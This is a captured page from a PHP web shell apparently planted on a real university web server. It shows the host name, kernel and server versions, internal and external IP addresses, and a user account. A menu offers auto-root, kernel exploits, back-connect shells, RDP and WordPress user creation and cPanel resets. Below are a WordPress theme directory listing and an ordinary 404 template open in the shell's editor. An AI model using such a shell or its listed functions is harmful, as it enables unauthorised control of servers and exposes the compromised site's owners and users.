Linux web-conference.aiou.edu.pk 5.4.0-204-generic #224-Ubuntu SMP Thu Dec 5 13:38:28 UTC 2024 x86_64
Apache/2.4.41 (Ubuntu)
: 172.16.50.247 | : 3.16.135.146
Cant Read [ /etc/named.conf ]
7.4.3-4ubuntu2.28
appadmin
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
BLACK DEFEND!
README
+ Create Folder
+ Create File
/
home /
appadmin /
cesa2025 /
wp-content /
themes /
jannah /
[ HOME SHELL ]
Name
Size
Permission
Action
assets
[ DIR ]
drwxrwxr-x
buddypress
[ DIR ]
drwxrwxr-x
demos
[ DIR ]
drwxrwxr-x
framework
[ DIR ]
drwxrwxr-x
inc
[ DIR ]
drwxrwxr-x
languages
[ DIR ]
drwxrwxr-x
plugins
[ DIR ]
drwxrwxr-x
templates
[ DIR ]
drwxrwxr-x
404.php
1.41
KB
-rw-rw-r--
archive-web-story.php
1.11
KB
-rw-rw-r--
archive.php
1.38
KB
-rw-rw-r--
author.php
1.42
KB
-rw-rw-r--
buddypress.php
816
B
-rw-rw-r--
category.php
3.89
KB
-rw-rw-r--
comments.php
1.52
KB
-rw-rw-r--
footer.php
404
B
-rw-rw-r--
functions.php
4.5
KB
-rw-rw-r--
header.php
681
B
-rw-rw-r--
index.php
1.05
KB
-rw-rw-r--
page.php
590
B
-rw-rw-r--
rtl.css
39.93
KB
-rw-rw-r--
screenshot.jpg
60.18
KB
-rw-rw-r--
search.php
1.45
KB
-rw-rw-r--
sidebar-footer.php
2.85
KB
-rw-rw-r--
sidebar-shop.php
751
B
-rw-rw-r--
sidebar-slide.php
4.07
KB
-rw-rw-r--
sidebar.php
2.42
KB
-rw-rw-r--
single.php
359
B
-rw-rw-r--
style.css
704
B
-rw-rw-r--
tag.php
1.42
KB
-rw-rw-r--
template-authors.php
230
B
-rw-rw-r--
template-masonry.php
377
B
-rw-rw-r--
template-sitemap.php
227
B
-rw-rw-r--
wpml-config.xml
7.11
KB
-rw-rw-r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : 404.php
<?php /** * The template for displaying 404 pages (not found) * */ defined( 'ABSPATH' ) || exit; // Exit if accessed directly get_header(); ?> <div <?php tie_content_column_attr(); ?>> <div class="container-404"> <?php /** * tie_before_404_content hook. */ do_action( 'TieLabs/before_404_content' ); ?> <?php if( tie_get_option( 'page_404_img' ) ){ echo '<img class="img-404" src="'. esc_url( tie_get_option( 'page_404_img' ) ) .'" alt="" />'; } ?> <h2><?php esc_html_e( '404 :(', TIELABS_TEXTDOMAIN ); ?></h2> <h3><?php esc_html_e( 'Oops! That page can’t be found.', TIELABS_TEXTDOMAIN ); ?></h3> <?php if( tie_get_option( 'page_404_search' ) ): ?> <h4><?php esc_html_e( 'It seems we can’t find what you’re looking for. Perhaps searching can help.', TIELABS_TEXTDOMAIN ); ?></h4> <div id="content-404"> <?php get_search_form(); ?> </div><!-- #content-404 /--> <?php endif; ?> <?php if( tie_get_option( 'page_404_menu' ) && has_nav_menu( '404-menu' ) ){ wp_nav_menu( array( 'menu_id' => 'menu-404', 'container_id' => 'menu-404', 'theme_location' => '404-menu', 'depth' => 1, )); } /** * tie_after_404_content hook. */ do_action( 'TieLabs/after_404_content' ); ?> </div><!-- .container-404 /--> </div><!-- .main-content /--> <?php get_footer(); ?>
Close